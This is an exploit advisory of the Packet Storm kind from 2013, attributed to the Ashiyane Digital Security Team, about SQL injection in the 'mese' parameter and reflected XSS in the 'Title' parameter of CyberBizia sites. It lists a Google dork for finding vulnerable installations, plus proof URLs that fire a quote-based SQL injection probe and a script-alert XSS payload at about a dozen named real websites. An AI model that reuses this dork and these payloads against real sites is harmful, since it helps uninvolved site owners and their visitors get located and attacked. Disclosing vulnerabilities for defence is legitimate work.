CyberBizia Cross Site Scripting / SQL Injection

2013-08-29T00:00:00
ID PACKETSTORM:123010
Type packetstorm
Reporter Ashiyane Digital Security Team
Modified 2013-08-29T00:00:00

Description

                                        
                                            `#********************************************************************************  
# Exploit Title : CyberBizia Multiple Vulnerabilites  
#  
# Software link : http://www.cyberbizia.com  
#  
# Exploit Author : Ashiyane Digital Security Team  
#  
# Tested on: Windows 7 , Linux  
#  
# Google Dork : intext:"Powered by CyberBizia"  
#  
# Date: 2013/08/30  
#  
--------------------------------------------------------------------  
# Exploit 1 : Sql Injection  
#  
# Location : [Target]/myasg/os.asp?elenca=mese&mese=[Sql Injection]  
#  
#  
# Proof:  
#  
# http://www.advancedcardiology.it/myasg/os.asp?elenca=mese&mese=1'  
  
#  
  
  
# http://www.artielavori.com/myasg/os.asp?elenca=mese&mese=1'  
#  
# http://www.basketquartu.it/myasg/os.asp?elenca=mese&mese=1'  
#  
# http://www.cdsdonnecagliari.it/myasg/os.asp?elenca=mese&mese=1'  
#  
# http://www.digicsoft.it/myasg/os.asp?elenca=mese&mese=1'  
#  
# http://www.costiauto.com/myasg/os.asp?elenca=mese&mese=1'  
#  
# http://www.cdsdonnecagliari.it/myasg/os.asp?elenca=mese&mese=1'  
#  
# http://www.basketquartu.it/myasg/os.asp?elenca=mese&mese=1'  
#  
# http://www.immobiliarevacanze.it/myasg/os.asp?elenca=mese&mese=1'  
#  
# http://www.magico-web.it/myasg/os.asp?elenca=mese&mese=1'  
#  
# http://www.archibaleno.it/myasg/os.asp?elenca=mese&mese=1'  
--------------------------------------------------------------------  
# Exploit 2 :  
#  
# Location : [Target]t/?Title=[xss]  
#  
#  
# Proof:  
#  
# http://www.advancedcardiology.it/?Title="/><script>alert(1);</script>  
  
#  
  
  
# http://www.artielavori.com/?Title="/><script>alert(1);</script>  
#  
# http://www.basketquartu.it/?Title="/><script>alert(1);</script>  
#  
# http://www.cdsdonnecagliari.it/?Title="/><script>alert(1);</script>  
#  
# http://www.digicsoft.it/?Title="/><script>alert(1);</script>  
#  
# http://www.costiauto.com/?Title="/><script>alert(1);</script>  
#  
# http://www.cdsdonnecagliari.it/?Title="/><script>alert(1);</script>  
#  
# http://www.basketquartu.it/?Title="/><script>alert(1);</script>  
#  
# http://www.immobiliarevacanze.it/?Title="/><script>alert(1);</script>  
#  
# http://www.mozzarellina.com/?Title="/><script>alert(1);</script>  
#  
# http://www.archibaleno.it/?Title="/><script>alert(1);</script>  
#  
######################  
discovered by : ACC3SS  
######################  
`